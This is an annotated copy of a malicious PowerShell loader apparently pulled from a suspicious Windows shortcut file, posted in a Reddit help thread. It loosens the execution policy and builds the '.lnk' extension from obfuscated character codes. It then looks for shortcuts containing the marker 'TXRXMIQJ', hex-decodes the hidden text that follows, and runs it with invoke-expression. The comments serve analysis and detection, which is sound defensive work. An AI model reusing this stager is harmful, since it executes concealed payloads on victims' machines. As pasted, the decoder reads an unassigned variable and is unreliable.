- #Direct link to reddit's post
- #https://www.reddit.com/r/PowerShell/comments/pg3po1/please_help_very_suspect_file_opened_on_my_pc_no/
- "%ÝwNÁç]N·D.±®Q˜·Ý•‰1SPSâŠXF¼L8C»ü“&˜mÎm-S-1-5-21-287986104-305762756-3537409591-1001LÀFá@PàOÐê:i¢Ø+00/C:\V1WINDOWS@ï¾.WINDOWSZ1System32Bï¾.System32t1WindowsPowerShellTï¾.WindowsPowerShellN1v1.0:ï¾.v1.0l2powershell.exeNï¾.powershell.exeÄ
- Set-ExecutionPolicyUnRestricted  # NOTE(review): whitespace looks lost in the paste; presumably "Set-ExecutionPolicy Unrestricted", i.e. the execution policy is loosened before the loader below runs — confirm against the original shortcut's arguments
- function Quiet-Content($path){  # Searches $path for files with a computed extension and returns the text that follows a marker string inside them; returns $Null when no file contains the marker
- $malicious_command=$Null  # result; stays $Null unless a matching file contains the marker
- $array=@(2037,2099,2101,2098)  # the extension's characters, each stored as character code + 1991
- $extension=$Null
- $number_to_substract=1991
- foreach($number_in_array in $array){
- $extension+=[Char]($number_in_array-$number_to_substract)  # 46,108,110,107 -> ".lnk"; the extension never appears as a literal in the script
- }
- Get-ChildItem $path -Recurse -Depth1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq $extension} | % {  # NOTE(review): "-Depth1" looks like "-Depth 1" with the space lost in the paste; enumeration errors are suppressed
- $child_content=[String](Get-Content $_.FullName )  # file content cast to a single string
- $matching_string='TXRXMIQJ'  # marker that precedes the embedded payload text; a candidate string to search for in suspicious shortcut files
- $index_of_string = $child_content.IndexOf($matching_string)
- if($index_of_string -ne -1){
- $malicious_file=$child_content.SubString($index_of_string)  # everything from the marker to the end of the content
- $malicious_command=$malicious_file.Replace($matching_string,'')  # removes every occurrence of the marker; if several files match, the last one processed wins
- }
- }
- return $malicious_command
- }
- function dll_builder($malicious_command){  # Decodes a string of hex digits into text, two digits per character; despite the name, the visible code only builds and returns a string
- $dll_builder=[Text.StringBuilder]::New()
- for($index=0 ; $index -lt $malicious_command.Length; $index+=2){  # one iteration per two-character hex pair
- [void]$dll_builder.Append([char][int]('0x'+$malicious_command.Substring($i,2)))  # NOTE(review): reads $i, but the loop counter is $index and $i is not assigned anywhere in this paste — possibly a slip from renaming variables during analysis; confirm against the original sample
- }
- return $dll_builder.ToString()
- }
- $malicious_command = Quiet-Content $(Get-Location).Path  # first search location: the current working directory
- if($malicious_command -eq $Null){
- $malicious_command=Quiet-Content$($env:TEMP)  # fallback search location: the user's TEMP directory (the space after Quiet-Content looks lost in the paste)
- }
- invoke-expression ((dll_builder $malicious_command))  # the decoded text is executed as PowerShell, so the actual payload never appears in this script; where PowerShell script block logging is enabled, the decoded content should be recorded (event ID 4104), which helps triage
- C:\WINDOWS\System32\imageres.dll
- %SystemRoot%\System32\imageres.dll
- %SystemRoot%\System32\imageres.dll